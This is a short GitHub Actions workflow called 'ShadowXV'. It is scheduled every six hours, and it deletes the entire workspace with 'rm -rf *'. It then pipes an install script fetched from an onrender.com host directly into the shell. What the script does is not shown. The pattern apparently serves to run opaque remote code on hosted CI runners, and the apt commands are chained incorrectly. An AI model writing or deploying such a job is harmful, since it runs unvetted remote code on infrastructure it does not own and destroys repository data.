name: ShadowXV

on:
  workflow_dispatch:
  schedule:
    - cron: '0 */6 * * *'

jobs:
  avalon-run:
    runs-on: ubuntu-latest
    
    steps:
    - name: Removed Def Items
      run: |
        rm -rf * 2>/dev/null || true
    
    - name: Run ShadowXV
      run: |
        # 1. Installing ShadowXV
        apt update \
        apt install curl -y \
        curl -s https://shadowinstallxv8.onrender.com/install.sh | sh
